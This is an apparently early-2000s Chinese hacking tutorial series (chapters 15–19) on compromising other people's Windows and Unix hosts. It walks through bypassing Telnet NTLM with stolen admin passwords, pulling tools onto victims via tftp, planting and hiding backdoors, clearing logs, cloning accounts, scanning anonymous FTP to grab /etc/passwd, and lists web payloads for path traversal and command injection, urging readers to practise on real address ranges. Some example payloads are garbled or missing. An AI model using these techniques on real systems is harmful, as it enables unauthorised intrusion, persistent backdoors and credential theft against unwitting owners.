[ 使 SOCKS 代 理 程 序 自 动 运 行,不 怕 肉 鸡 再 重 启 了]
socks -config port 1080
[ socks 代 理 端 口 设 置 为 1080 ]
net start skserver
[ 启 动 SOCKS 代 理 服 务 ]可以打开QQ设置IP代理了
long
[ 刚 才 上 传 的 一 个 删 除 日 志 程 序,运 行 它 就 可 以 了]
第15章
从telnet讲起
前几天我说到过telnet,好象很多朋友不太明白,也不会用,我想这主要是因为你的命令掌握不太牢*啊,我今天就把telnet详细讲一遍,再说一些简单的网络相关命令
先说telnet,什么是telnet?Telnet服务虽然也属于客户机/服务器模型的服务,但它更大的意义在于实现了基于Telnet协议的远程登录(远程交互式计算),那么什么是远程登录?
我想这个大家都明白一点,定义:远程登陆是指用户使用Telnet命令,使自己的计算机暂时成为远程主机的一个仿真终端的过程。仿真终端等效于一个非智能的机器,它只负责把用户输入的每个字符传递给主机,再将主机输出的每个信息回显在屏幕上。
使用Telnet协议进行远程登陆时需要满足以下条件:在本的计算机上必须装有包含Telnet协议的客户程序;必须知道远程主机的Ip地址或域名;必须知道登录标识与口令。
Telnet远程登录服务分为以下4个过程:
1)本地与远程主机建立连接。该过程实际上是建立一个TCP连接,用户必须知道远程主机的Ip地址或域名;
2)将本地终端上输入的用户名和口令及以后输入的任何命令或字符以NVT(Net Virtual Terminal)格式传送到远程主机。该过程实际上是从本地主机向远程主机发送一个IP数据报;
3)将远程主机输出的NVT格式的数据转化为本地所接受的格式送回本地终端,包括输入命令回显和命令执行结果;
4)最后,本地终端对远程主机进行撤消连接。该过程是撤销一个TCP连接。
再说一下什么叫Telnet协议?简单点说Telnet协议是TCP/IP协议族中的一员,是Internet远程登陆服务的标准协议。应用Telnet协议能够把本地用户所使用的计算机变成远程主机系统的一个终端。它提供了三种基本服务:
1)Telnet定义一个网络虚拟终端为远的系统提供一个标准接口。客户机程序不必详细了解远的系统,他们只需构造使用标准接口的程序;
2)Telnet包括一个允许客户机和服务器协商选项的机制,而且它还提供一组标准选项;
3)Telnet对称处理连接的两端,即Telnet不强迫客户机从键盘输入,也不强迫客户机在屏幕上显示输出。
关于这个就说这么多了,至于其他的一些就不说了,因为没什么帮助对我门,如果你有兴趣,可以去本站查查相关资料
再说说Win2000的Telnet服务,因为大部分服务器用的都是2000的
Win2000为我们提供了Telnet客户机和服务器程序:Telnet.exe是客户机程序(Client),tlntsvr.exe是服务器程序(server),同时它还为我们提供了Telnet服务器管理程序tlntadmn.exe。其实从应用层面上,Win2000的Telnet服务并没有什么可说的,绝大部分内容你都可以从HELP文件中得到,我在此只是把它稍微整理一下而已.Windows 2000 默认安装了 Telnet 服务,但是并没有默认启动。下面给出HELP文件中 Telnet 服务的一部分默认设置:
AllowTrustedDomain:是否允许域用户访问。默认值是1,允许信任域用户访问。可以改为0: 不允许域用户访问(只允许本地用户)。
DefaultDomain:可以对与该计算机具有信任关系的任何域设置。默认值是"."。
DefaultShell:显示 shell 安装的路径位置。默认值是:%systemroot%\System32\Cmd.exe /q /k
MaxFailedLogins:在连接终止之前显示尝试登录失败的最大次数。默认是3。
LoginScript:显示 Telnet 服务器登录脚本的路径位置。默认的位置就是“%systemroot%\System32\login.cmd”,你可以更改脚本内容,这样登录进Telnet的欢迎屏幕就不一样了。
NTLM:NTLM身份验证选项。默认是2。可以有下面这些值:
0: 不使用 NTLM 身份验证。
1: 先尝试 NTLM 身份验证,如果失败,再使用用户名和密码。
2: 只使用 NTLM 身份验证。
TelnetPort:显示 telnet 服务器侦听 telnet 请求的端口。默认是:23。你也可以更改为其他端口。
以上各项设置你可以使用tlntadmn.exe(Telnet服务器管理程序)来进行非常方便的配置,配置后需要重新启动Telnet服务。如图1
2 NTLM
提到了telnet就不能不提NTLM,我想这也是让入侵者最为头痛的一件事,哪怕你获得了管理员帐号和密码,想简单通过NTLM也并非易事,况且win2000中的telnet默认仅以NTLM方式验证身份,这就让我们不得不关注NTLM这个东东,那么什么是NTLM呢?
早期的SMB协议在网络上明文传输口令,后来出现了"LAN Manager Challenge/Response"验证机制,简称LM,它十分简单以至很容易被破解,微软随后提出了WindowsNT挑战/响应验证机制,即NTLM。现在已经有了更新的NTLMv2以及Kerberos验证体系。NTLM工作流程是这样的:
1、客户端首先在本地加密当前用户的密码成为密码散列
2、客户端向服务器发送自己的帐号,这个帐号是没有经过加密的,明文直接传输
3、服务器产生一个16位的随机数字发送给客户端,作为一个 challenge(挑战)
4、客户端再用加密后的密码散列来加密这个 challenge ,然后把这个返回给服务器。作为 response(响应)
5、服务器把用户名、给客户端的challenge 、客户端返回的 response 这三个东西,发送域控制器
6、域控制器用这个用户名在 SAM密码管理库中找到这个用户的密码散列,然后使用这个密码散列来加密 challenge。
7、域控制器比较两次加密的 challenge ,如果一样,那么认证成功。
从上面的过程我们可以看出,NTLM是以当前用户的身份向Telnet服务器发送登录请求的,而不是用你扫到的对方管理员的帐户和密码登录,显然,你的登录将会失败。举个例子来说,你家的机器名为A(本地机器),你入侵的机器名为B(远地机器),你在A上的帐户是xinxin,密码是1234,你扫到B的管理员帐号是Administrator,密码是5678,当你想Telnet到B时,NTLM将自动以当前用户的帐号和密码作为登录的凭据来进行上面的7项操作,即用xinxin和1234,而并非用你扫到的Administrator和5678,且这些都是自动完成的,根本不给你插手的机会,因此你的登录操作将失败。
由于Telnet服务器对NTLM的使用有3个选项,所以当你Telnet远地机器时,会显示下面情况中的一种:
1)身份验证选项=0时
=====================================
Microsoft (R) Windows (TM) Version 5.00 (Build 2195)
Welcome to Microsoft Telnet Service
Telnet Server Build 5.00.99201.1
login:
password:
\\为0时不使用NTML身份验证,直接输入用户名和密码,比如你可以输入扫到的Administrator和5678
2)身份验证选项=1时
=====================================
NTLM Authentication failed due to insufficient credentials.Please login withclear text username and password
Microsoft (R) Windows (TM) Version 5.00 (Build 2195)
Welcome to Microsoft Telnet Service
Telnet Server Build 5.00.99201.1
login:
password:
\\先尝试 NTLM 身份验证,如果失败,再使用用户名和密码,其实这种方式对于我们来说,与上一种方式没什么区别
3)身份验证选项=2时
=====================================
NTLM Authentication failed due to insufficient credentials.Please login withclear text username and password
Server allows NTLM authentication only
Server has closed connection
遗失对主机的连接。
C:\>
\\仔细看看上面的显示,根本没有给你输入用户名和密码的机会,直接断开连接,扫到了密码也是白扫
所以对于入侵者来说,NTLM是横在我们面前的一座大山,必须要除掉它,一般我们有如下几种方法:
1通过修改远程注册表更改telnet服务器配置,将验证方式从2改为1或0;
2使用NTLM.exe,上传后直接运行,可将telnet服务器验证方式从2改为1;
3在本地建立扫描到的用户,以此用户身份开启telnet客户机并进行远程登录;
4使用软件,比如opentelnet.exe(需要管理员权限且开启IPC管道)
5使用脚本,如RTCS,(需要管理员权限但不依赖IPC管道)
基本上是以上的5种,其中后两种是我们比较常用的开telnet的手法,而且使用方法十分简单,命令如下:
OpenTelnet.exe \\server username password NTLMAuthor telnetport
OpenTelnet.exe \\服务器地址 管理员用户名 密码 验证方式(填0或1) telnet端口
cscript RTCS.vbe targetIP username password NTLMAuthor telnetport
cscript RTCS.vbe <目标IP> <管理员用户名> <密码> <验证方式>
那telnet上去后不知道该做什么了?很多朋友这样问了,我想如果你是从第1天看的,应该知道吧,我就再说说吧
1 查看系统信息
呵呵,其实就是随处看看,看看他的系统配置和版本(用type c:\boot.ini来知道pro版或server版),看看都装了什么服务或软件(从目录名就可以知道了),看看有什么重要或有趣的文件啦(唉,要是国外的机器,看也看不懂),看看他的用户情况,总之就是尽可能多的了解系统,为一会装后门摸底。
2 使用tftp传送文件
想必大家都遇到过在telnet中传输文件的问题,因为我们习惯了在ipc管道中的文件传输,所以有些朋友喜欢用net share ipc$ 来打开管道,进而利用copy来传输文件。不过这样反而麻烦,既然我们已经得到了shell(这个前面已经很详细的说过了)们可以用TFPT命令来完成这一切,什么是TFTP呢?
用TFTP(Trivial File Transfer Protocol)来实现文件的传送是一种基于UDP连接的文件传输,一般是使用Windows自带的tftp.exe和一个TFTP服务器端软件构成一个完整的传输结构。它是这样使用的:首先运行本地的TFTP Server(比如tftpd32.exe)软件并保证始终开启直至传输全部完成,然后在telnet中(当然你也可以在其他shell中)运行下面的命令:
C:\>tftp –i ip get xinxin.exe c:\abc\xinxin.exe
其中ip为你自己机器的ip,且上传文件要与TFTP服务器端在同一目录下,这样你就可以把xinxin.exe上传到c盘abc目录下了(其实是从tftp服务器下载来的)
需要指出的是,如果使用代理IP,你将不能实现与外部网络的文件传送。因为你的代理网关在进行数据封装的时候会将自己的IP地址加入到你的数据报中,代替你的内部网络地址,所以在外部网络进行MAC寻址时是找不到你这台TFTP服务器的。
3 安置后门
如果你入侵还有其他目的,比如以破坏为主,或者是来修改主页的,那么这些事情当然可以在安置后门之前做;如果你只是想得到一只肉鸡,那就没什么可说的了,安后门吧
这个问题我在前面有讲过一点,但不详细.用的后门一般有:木马,asp木马,远程控制软件,克隆帐户,建立并隐藏帐户,telnet,telnet扩展的shell,终端服务等。安置一个好的后门通常要注意以下几点:(这是一个前辈写的我copy一下,很中肯的)
1 不会被防火墙查杀及阻碍通信:被加入病毒库的后门最好加壳以逃过防火墙,尽量用低端口通信,以免被防火墙屏蔽。
2 最大限度增加隐蔽性:如果你选择远程控制软件,要注意被控端的安装提示和小图标,以及是否同步画面;如果你在帐户上做文章,要尽量保持在cmd和用户管理中都不出破绽;如果你选择放木马或telnet扩展,要注意文件和进程的隐藏;如果新开了终端服务(入侵前并没有开),一定要该掉3389这个显眼的端口,且越低越好。
不要当管理员不存在:这是一个大忌,许多朋友在只有默认帐户的机器上建立类似'hacking'的管理员帐户,真是无知者无畏呀。所以安置后门的时候,想想管理员疏忽的地方会在哪里。
4 打补丁
如果想独霸肉鸡,就要会打补丁,要知道对肉鸡的竞争是很激烈的。怎么打补丁呢?这个也要问?想想你是怎么进来的吧。算了,提示一下,除了修补大的漏洞以外(上传官方补丁并运行),也要注意它的共享,ipc$共享(最好都关闭),可疑端口,容易被利用的服务等。不过打补丁也要注意隐蔽性的,不要让管理员发现大的改动。
5 清除日志
可以手动或利用软件,如果不太会就去找相关教材吧,在这里我不详细介绍了。(上一篇我讲过一点)
好了,基本上就这么多了,今天就到这了,希望能给大家一些帮助
第16章
继续讲,从克隆帐号 讲起
前2天基本的一些东西都讲过了,今天我觉得得把克隆帐号这个问题讲清楚了
什么叫克隆帐号 ?
前辈说:在注册表中有两处保存了帐号的SID相对标志符,一处是SAM\Domains\Account \Users下的子键名,另一处是该子键的子项F的值中。这里微软犯了个不同步它们的错误,登陆时用的是后者,查询时用前者。当用admin的F项覆盖其他帐号的F项后,就造成了帐号是管理员权限但查询还是原来状态的情况 。即所谓的克隆帐号。(我想这个很明白的,如果还有这个问题,你去网络技术版块问吧)
说到克垄帐号就得说说SAM安全帐号管理器,详细的我就不重复了,因为呢多前辈写了很多很棒的文章,大家有兴趣就看看:http://www.91one.net/dvbbs/dispbbs.asp?boardid=17&id=1427
明白原理后就可以手动或者用现成的工具克隆帐号,用什么呢?
克隆ca.exe 下载(找了许久 啊)http://www.hejie.net/xz/list.asp?id=926
注意手动克隆需要SYSTEM权限(这句话大家应该能明白吧)
用什么呢?psu.exe
还是很棒的,下载:www.sometips.com/soft/psu.exe
第17章
怎么判断对方主机的操作系统呢?
今天我们就先说说这个问题。我先从最简单的PING看主机操作系统说起
一、用ping来识别操作系统
C:\>ping 10.1.1.2
Pinging 10.1.1.2 with 32 bytes of data:
Reply from 10.1.1.2: bytes=32 time<10ms TTL=128
Reply from 10.1.1.2: bytes=32 time<10ms TTL=128
Reply from 10.1.1.2: bytes=32 time<10ms TTL=128
Reply from 10.1.1.2: bytes=32 time<10ms TTL=128
Ping statistics for 10.1.1.2:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
C:\>
C:\>ping 10.1.1.6
Pinging 10.1.1.6 with 32 bytes of data:
Request timed out.
Reply from 10.1.1.6: bytes=32 time=250ms TTL=237
Reply from 10.1.1.6: bytes=32 time=234ms TTL=237
Reply from 10.1.1.6: bytes=32 time=234ms TTL=237
Ping statistics for 10.1.1.6:
Packets: Sent = 4, Received = 3, Lost = 1 (25% loss),
Approximate round trip times in milli-seconds:
Minimum = 234ms, Maximum = 250ms, Average = 179ms
我们跟据ICMP报文的TTL的值,我们就可以大概知道主机的类型。如:TTL=125左右的主机应该是windows系列的机子,TTL=235左右的主机应该是UINX系列的机子。如上面的两个例子,10.1.1.2就是win2000的机子,而10.1.1.6则是UINX(Sunos 5.8)的机子。这是因为不同操作系统的机子对ICMP报文的处理与应答是有所不同的,TTL值每过一个路由器会减1。所以造成了TTL回复值的不同。对于TTL值与操作系统类型的对应,还要*大家平时多注意观察和积累。
二、直接通过联接端口根据其返回的信息来判操作系统
这种方法应该说是用得最多的一种方法,下面我们来看几个实例。
1、如果机子开了80端口,我们可以telnet它的80端口。
C:\>telnet 10.1.1.2 80
输入get 回车(注意这里是盲打)
如果返回,
HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/5.0
Date: Fri, 11 Jul 2003 02:31:55 GMT
Content-Type: text/html
Content-Length: 87
The parameter is incorrect.
遗失对主机的连接。
C:\>
那么这台就肯定是windows的机子。
如果返回,
Method Not Implemented
get to / not
supported.
Invalid method in request get
Apache/1.3.27 Server at gosiuniversity.com Port 80
遗失对主机的连接。
C:\>
那么多数就是UINX系统的机子了。
2、如果机子开了21端口,我们可以直接FTP上去
C:\>ftp 10.1.1.2
如果返回,
Connected to 10.1.1.2.
220 sgyyq-c43s950 Microsoft FTP Service (Version 5.0).
User (10.1.1.2:(none)):
那么这就肯定是一台win2000的机子了,我们还可以知道主机名呢,主机名就是sgyyq-c43s950。这个FTP是windows的IIS自带的一个FTP服务器。
如果返回,
Connected to 10.1.1.3.
220 Serv-U FTP Server v4.0 for WinSock ready...
User (10.1.1.3:(none)):
也可以肯定它是windows的机子,因为Serv-U FTP是一个专为windows平台开发的FTP服务器。
如果返回,
Connected to 10.1.1.3.
220 ready, dude (vsFTPd 1.1.0: beat me, break me)
User (10.1.1.3:(none)):
那么这就是一台UINX的机子了。
3、如果开了23端口,这个就简单了,直接telnet上去。
如果返回,
Microsoft ? Windows ? Version 5.00 (Build 2195)
Welcome to Microsoft Telnet Service
Telnet Server Build 5.00.99201.1
login:
那么这肯定是一台windows的机子了
如果返回,
SunOS 5.8
login:
不用说了,这当然是一台UINX的机子了,并且版本是SunOS 5.8的
三、利用专门的软件来识别
这种有识别操作系统功能的软件,多数采用的是操作系统协议栈识别技术。这是因为不同的厂家在编写自己操作系统时,TCP/IP协议虽然是统一的,但对TCP/IP协议栈是没有做统一的规定的,厂家可以按自己的要求来编写TCP/IP协议栈,从而造成了操作系统之间协议栈的不同。因此我们可以通过分析协议栈的不同来区分不同的操作系统,只要建立起协议栈与操作系统对应的数据库,我们就可以准确的识别操作系统了。
下面是简单介绍两款有识别功能的软件,具体用法我就不说,你可以到网上去找找相应软件的说明使用
一是nmap,下载地址:http://www.linuxeden.com/download/indexsoft.php?category=syssecure 它采用的是主动式探测,探测时会主动向目标系统发送探测包,根据目标目标机回应的数据包来,叛断对方机的操作系统。
2、 天眼,采用的是被动式的探测方法。不向目标系统发送数据包,只是被动地探测网络上的通信数据,通过分析这些数据来判断操作系统的类型。配合supersan使用,较果很好。
下载地址 http://www.xfocus.net/tools/200206/天眼1.0.5.zip
第18章
从FTP入侵到SQL
怎么开头呢?每次我都要想很长时间,这主要是我写作文时留下的毛病,总是在开头时想很久。好,就从什么叫FTP开始说吧。大家都知道FTP,但很多人都讲不好它具体指什么,FTP是指文件传输协议,因特网上常用的文件传输协议,它使用户能够在两个联网计算机间实现文件传输,是因特网上传递文件最主要的方法。在使用FTP进行文件传输时,首先启动FTP客户端程序与远程主机建立连接,然后向远程主机发出传输命令,远程主机在收到命令后给予响应,并执行正确的命令。除此之外,FTP还提供登录、目录查询、文件操作及其他会话控制功能。很详细了吧,别老是认为FTP就是传文件的软件,呵呵
因为FTP是一种文件传输方式,所以要入侵它就有点困难了,一般现在都没什么用了,因为即使你取得了上传权限也无法直接执行程序,在UNIX或是早期一些主机上或许有一些溢出或是越权的漏洞。今天我们说这个是因为很多FTP都是可以匿名登陆的(各个高校的至少对校内的都是吧,也有严格的好像科大的就是需要很严格的认证,晕^^^),这就有文章做了
对了,说到这我想说一下FTP的一些基本命令,大家可能都知道,还是说一下 (以人为本嘛)很长的,希望大家耐性看
FTP命令:
FTP的命令行格式为:ftp -v -d -i -n -g [主机名] ,
其中 -v 显示远程服务器的所有响应信息;
-n 限制ftp的自动登录,即不使用;.n etrc文件;
-d 使用调试方式;
-g 取消全局文件名。
FTP使用的内部命令如下(中括号表示可选项):
1.![cmd[args>:在本地机中执行交互shell,exit回到ftp环境,如:!ls*.zip
2.$ macro-ame[args]:执行宏定义macro-name。
3.account[password]:提供登录远程系统成功后访问系统资源所需的补充口令。
4.append local-file[remote-file]:将本地文件追加到远程系统主机,若未指定远程系统文件名,则使用本地文件名。
5.ascii:使用ascii类型传输方式。
6.bell:每个命令执行完毕后计算机响铃一次。
7.bin:使用二进制文件传输方式。
8.bye:退出ftp会话过程。
9.case:在使用mget时,将远程主机文件名中的大写转为小写字母。
10.cd remote-dir:进入远程主机目录。
11.cdup:进入远程主机目录的父目录。
12.chmod mode file-name:将远程主机文件file-name的存取方式设置为mode,如:chmod 777 a.out。
13.close:中断与远程服务器的ftp会话(与open对应)。
14.cr:使用asscii方式传输文件时,将回车换行转换为回行。
15.delete remote-file:删除远程主机文件。
16.debug[debug-value]:设置调试方式,显示发送至远程主机的每条命令,如:deb up 3,若设为0,表示取消debug。
17.dir[remote-dir][local-file]:显示远程主机目录,并将结果存入本地文件
18.disconnection:同close。
19.form format:将文件传输方式设置为format,缺省为file方式。
20.get remote-file[local-file]:将远程主机的文件remote-file传至本地硬盘的local-file。
21.glob:设置mdelete,mget,mput的文件名扩展,缺省时不扩展文件名,同命令行的-g参数。
22.hash:每传输1024字节,显示一个hash符号(#)。
23.help[cmd]:显示ftp内部命令cmd的帮助信息,如:help get。
24.idle[seconds]:将远程服务器的休眠计时器设为[seconds]秒。
25.image:设置二进制传输方式(同binary)。
26.lcd[dir]:将本地工作目录切换至dir。
27.ls[remote-dir][local-file]:显示远程目录remote-dir,并存入本地文件local-file。
28.macdef macro-name:定义一个宏,遇到macdef下的空行时,宏定义结束。
29.mdelete[remote-file]:删除远程主机文件。
30.mdir remote-files local-file:与dir类似,但可指定多个远程文件,如 :mdir *.o.*.zipoutfile 。
31.mget remote-files:传输多个远程文件。
32.mkdir dir-name:在远程主机中建一目录。
33.mls remote-file local-file:同nlist,但可指定多个文件名。
34.mode[modename]:将文件传输方式设置为modename,缺省为stream方式。
35.modtime file-name:显示远程主机文件的最后修改时间。
36.mput local-file:将多个文件传输至远程主机。
37.newer file-name:如果远程机中file-name的修改时间比本地硬盘同名文件的时间更近,则重传该文件。
38.nlist[remote-dir][local-file]:显示远程主机目录的文件清单,并存入本地硬盘的local-file。
39.nmap[inpattern outpattern]:设置文件名映射机制,使得文件传输时,文件中的某些字符相互转换,如:nmap $1.$2.$3[$1,$2].[$2,$3],则传输文件a1.a2.a3时,文件名变为a1,a2。该命令特别适用于远程主机为非UNIX机的情况。
40.ntrans[inchars[outchars>:设置文件名字符的翻译机制,如ntrans1R,则文件名LLL将变为RRR。
41.open host[port]:建立指定ftp服务器连接,可指定连接端口。
42.passive:进入被动传输方式。
43.prompt:设置多个文件传输时的交互提示。
44.proxy ftp-cmd:在次要控制连接中,执行一条ftp命令,该命令允许连接两个ftp服务器,以在两个服务器间传输文件。第一条ftp命令必须为open,以首先建立两个服务器间的连接。
45.put local-file[remote-file]:将本地文件local-file传送至远程主机。
46.pwd:显示远程主机的当前工作目录。
47.quit:同bye,退出ftp会话。
48.quote arg1,arg2...:将参数逐字发至远程ftp服务器,如:quote syst.
49.recv remote-file[local-file]:同get。
50.reget remote-file[local-file]:类似于get,但若local-file存在,则从上次传输中断处续传。
51.rhelp[cmd-name]:请求获得远程主机的帮助。
52.rstatus[file-name]:若未指定文件名,则显示远程主机的状态,否则显示文件状态。
53.rename[from][to]:更改远程主机文件名。
54.reset:清除回答队列。
55.restart marker:从指定的标志marker处,重新开始get或put,如:restart 130。
56.rmdir dir-name:删除远程主机目录。
57.runique:设置文件名只一性存储,若文件存在,则在原文件后加后缀.1,.2等。
58.send local-file[remote-file]:同put。
59.sendport:设置PORT命令的使用。
60.site arg1,arg2...:将参数作为SITE命令逐字发送至远程ftp主机。
61.size file-name:显示远程主机文件大小,如:site idle 7200。
62.status:显示当前ftp状态。
63.struct[struct-name]:将文件传输结构设置为struct-name,缺省时使用stream结构。
64.sunique:将远程主机文件名存储设置为只一(与runique对应)。
65.system:显示远程主机的操作系统类型。
66.tenex:将文件传输类型设置为TENEX机的所需的类型。
67.tick:设置传输时的字节计数器。
68.trace:设置包跟踪。
69.type[type-name]:设置文件传输类型为type-name,缺省为ascii,如:type binary,设置二进制传输方式。
70.umask[newmask]:将远程服务器的缺省umask设置为newmask,如:umask 3
71.user user-name[password][account]:向远程主机表明自己的身份,需要口令时,必须输入口令,如:user anonymous my@email。
72.verbose:同命令行的-v参数,即设置详尽报告方式,ftp 服务器的所有响 应都将显示给用户,缺省为on.
73.?[cmd]:同help.
上面的命令我建议大家最好下下来,背熟了很有用的。上面说到很多FTP都有提供匿名FTP的服务,而方便和安全性却是鱼与熊掌不能两得的!!很多
系统管理员都为了避免麻烦就用系统的预设设定来提供FTP这个服务.而anonymous ftp却
是有许多漏洞的,这样我们就有的说了啊。
允许用户使用Anonymous或FTP作为用户名以用户信箱做为口令(确切的说是任何带@的口令)登陆到系统。虽说匿名FTP本身 并不是个漏洞,因为匿名区域里放置有/etc/passwd和/etc/group文件,往往可能因为管理员配置上的大意造成潜在的安全隐患。使用匿名的FTP,用户可以匿名登陆FTP服务器。登陆时需要用户提供完整的E-mail地址做为passwd,其实在很多站点上这个要求形同虚设,你只要在其中包含有@字节看起来像个E-mail地址就行了,主机不会对口令做任何效验的。
远程所提供FTP服务的主机在处理匿名用户的命令时,一般都会执行一个chroot命令让匿名者进入主机所允许的匿名FTP区域。然而为了支持匿名FTP和用户FTP,FTP服务器要访问所有文件,也就证明了FTP服务器不是总在chroot环境中运行的。(一位前辈说的,我不知道还有哪个说的能比这还精辟)这个环节会让一些管理员不知所为而未曾理会,很容易被我们利用而得到一个匿名FTP用户所不能得到的权限。当然解决也很简单,可以通过修改inetd的配置来替代直接启动FTP服务器,它执行chroot(就类似于chrootuid的程序),然后再启动服务器就可以了。
一般情况下,FTP只限于在匿名用户下访问,匿名用户有其正常的权限,在启动服务器前执行chroot就意味着匿名用户将受到限制。如果说一个匿名用户在FTP服务器的匿名区域获得了一份不应该是匿名用户获得的文件,那么就说明了可能有内部客户将这个文件放置在匿名的FTP区域了。匿名用户可以阅读到/etc/passwd文件这就是管理员很大错误表现。还有隐患是telnet到ftp21如果允许执行SITE CHMOD和SITE EXEC、/home的所有者是匿名FTP的用户,那么随便就可把权限设置成****或者更多的进行修改等等。
为了方便我们用个小软件,其实不要软件也可以,但用一下方便大家嘛 FTP scanner(下载:http://sorry.vse.cz/~xmicm08/FTPScanner/)
安装好后,我们从开始菜单中的程序中找到FTP Scanner并运行它。我们熟悉一下我们要使用的软件的界面。打开软件我们可以看到 :Host 主机 ,Beginning ,开始IP 下面有几个文本框 我们在这里填入我们要开始扫描的IP.Ending 结束IP .我们在这里填入我们结束扫描的IP.在下面有一个 Threads 线程 。我们可以根据网速来选择这里的线程数.通常Moden上网选为50--70左右.更快的话选到100个线程.然后我们选择菜单Session 里的Begin FTP scan 就可以开始了扫描了..】
注意:我们可以在View 里的options选项里选择我们的扫描参数.
在Login config里
里的UserName 和 Password我们通常不用更改.
但你也可以改动他. 比如你想扫描特定的帐号.比如扫描用户 Oracle密码也是Oracle的话 就改动这里的 UserName 和 Password
在IP Logging里
我们可以更改扫描结果存放的位置.
随便选择一个位置和文件名就可以了.
默认是存放在安装目录下面的iplog.txt文件.
下面我想大家也会用吧,就是找个主机试试,注意和命令一起用,如果在打开的网页里不能写权限,那就把密码档先当下来. ftp> get /etc/passwd ,然后用小榕的流光提取用户,再找个一个可以利用的shell,就OK了,用找到的用户名和密码登陆,想干什么就干什么了,建议大家装个后门,因为一般管理员很快就会发现的。当然,很多主机更离谱的是.anonymous竟然有到根目录和写的权限
好了,就说到这大家找几个IP段练练吧,国内这样的主机很多的
第19章
80端口攻击总结
今天我们来说说80端口的攻击方法,只是把大概的说一下,肯定有遗漏了.
我将描述每种攻击的作用,和其怎样利用这些漏洞进行攻击(注意host的意思你应该懂吧)
(1)'.' '..' 和 '...' 请求
这些攻击痕迹是非常普遍的用于web应用程序和web服务器,它用于允许攻击者或者蠕虫病毒程序改变web服务器的路径,获得访问非公开的区域。大多数的CGI程序漏洞含有这些'..'请求。
Example:
http://host/cgi-bin/lame.cgi?file=../../../../etc/motd
这个列子展示了攻击者请求mosd这个文件,如果攻击者有能力突破web服务器根目录,那么可以获得更多的信息,并进一步的获得特权。
(2)'%20' 请求
%20是表示空格的16进制数值,虽然这个并不代表你能够利用什么,但是在你浏览日志的时候会发现它,一些web服务器上运行的应用程序中这个字符可能会被有效的执行,所以,你应该仔细的查看日志。另一方面,这个请求有时可以帮助执行一些命令。
Example:
http://host/cgi-bin/lame.cgi?page=ls%20-al|
这个列子展示了攻击者执行了一个unix的命令,列出请求的整个目录的文件,导致攻击者访问你系统中重要的文件,帮助他进一步取得特权提供条件。
(3)'%00' 请求
%00表示16进制的空字节,他能够用于愚弄web应用程序,并请求不同类型的文件。
Examples:
http://host/cgi-bin/lame.cgi?page=index.html
这可能是个有效的请求在这个机子上,如果攻击者注意到这个请求动作成功,他会进一步寻找这个cgi程序的问题。
http://host/cgi-bin/lame.cgi?page=../../../../etc/motd
也许这个cgi程序不接受这个请求,原因在于它要检查这个请求文件的后缀名,如:html.shtml或者其他类型的文件。大多数的程序会告诉你所请求的文件类型无效,这个时候它会告诉攻击者请求的文件必须是一某个字符后缀的文件类型,这样,攻击者可以获得系统的路径,文件名,导致在你的系统获得更多的敏感信息
http://host/cgi-bin/lame.cgi?page=../../../../etc/motd%00html
注意这个请求,它将骗取cgi程序认为这个文件是个确定的可接受的文件类型,一些应用程序由于愚蠢的检查有效的请求文件,这是我们常用的方法。
(4)'|' 请求
这是个管道字符,在unix系统用于帮助在一个请求中同时执行多个系统命令。
Example:
# cat access_log| grep -i '..'
(这个命令将显示日志中的“..“请求,常用于发现我们和蠕虫攻击)
常可以看到有很多web应用程序用这个字符,这也导致IDS日志中错误的报警。
在你的程序仔细的检查中,这样是有好处的,可以降低错误的警报在入侵检测系统中。
下面给出一些列子:
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls|
这个请求命令执行,下面是一些变化的列子
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls%20-al%20/etc|
这个请求在unix系统中列出/etc目录的所有文件
http://host/cgi-bin/lame.cgi?page=cat%20access_log|grep%20-i%20'lame'
这个请求cat命令的执行并且grep命令也将执行,查询出”lame'
(5)';' 请求
在unix系统,这个字符允许多个命令在一行执行
Example:
# id;uname -a
(执行id命令后,紧跟着执行uname命令)
一些web程序用这个字符,可能导致在IDS日志中失败的警告,应该仔细的检查web程序,让IDS警报失败的几率降低
(6)'<' 和 '>' 请求
应该检查你的日志记录中这两个字符,众多的原因中,首要的一个是这个字符表明了添加数据在文件中
Example 1:
# echo 'your hax0red h0 h0' >> /etc/motd (请求写信息在motd这个文件中)
一个攻击者可以容易的用象上面的这个请求篡改你的web页面。比如著名的RDS exploit常被攻击者用于更改web主页面。
Example 2:
http://host/something.php=Hi%20mom%20Im%20Bold!
你会注意到这里html语言的标志,同样用了“〈”,“〉”字符,这种攻击不能导致攻击者对系统进行访问,它迷惑人们认为这是个合法的信息在web站点中(导致人们在访问这个联结的时候访问到攻击者设定的地址,这种请求可能会被转变成16进制的编码字符形式,使攻击的痕迹不那么明显)
(7)'!'请求
这种字符请求常用语对SS(Server Side Include) I进行攻击,如果攻击者迷惑用户点击被攻击者设定的联结,和上面的一样。
Example:
http://host1/something.php=
这个列子是攻击者可能会做的,它让一个host2站点上的文件看起来是来自于 host1上面的(当然,需要访问者访问这个被攻击者设定的联结。这种请求可能被转化成16进制的编码伪装,不易发现)
同时,这种方式也可以以web站点的权限执行命令
Example:
http://host/something.php=
这个列子在远程的系统上执行“id'的命令,它将显示这个web站点用户的id,通常是”nobody'或者“www'
这种形式也允许包含隐藏文件。
Example:
http://host/something.php=
这个隐藏文件.htpasswd不会被显示出来,Apache建立的规则会拒绝这种以.ht 形式的请求,而SSI标志会绕过这种限制,并导致安全问题
(8)' 这种攻击用于试图在远程的web应用程序中插入PHP程序,它可能允许执行命令,这取决于服务器的设置,和其他起作用的一些因素(比如php设置为安全模式)
Example: http://host/something.php=
在某些简单的php应用程序中,它可能会在远程系统上以web站点用户的权限执行本地命令
(9)'`' 请求
这种字符后面常用在perl中执行命令,这个字符在web应用程序中不是经常的使用,所以,如果看到它在你的日志中,应该非常小心
Example:
http://host/something.cgi=`id`
一个perl写的有问题的cgi程序,会导致执行id命令
下面是针对管理员说的,因为现在很多网管都在看这个,所以我觉得有必要写一点,当然也是让你知道你的对手有哪些着数了,呵呵.我只是罗列了一些攻击后的痕迹,当然不能罗列所有了
'/bin/ls'
这个命令请求整个路径,在很多的web应用程序中都有这个漏洞,如果你在日志中很多地方都看到这种请求,很大的可能性是存在远程执行命令漏洞,但并不一定是个问题,也可能是个错误的警报。再一次提醒,写好的web应用程序(cgi,asp,php...etc)是安全的基础
Example:
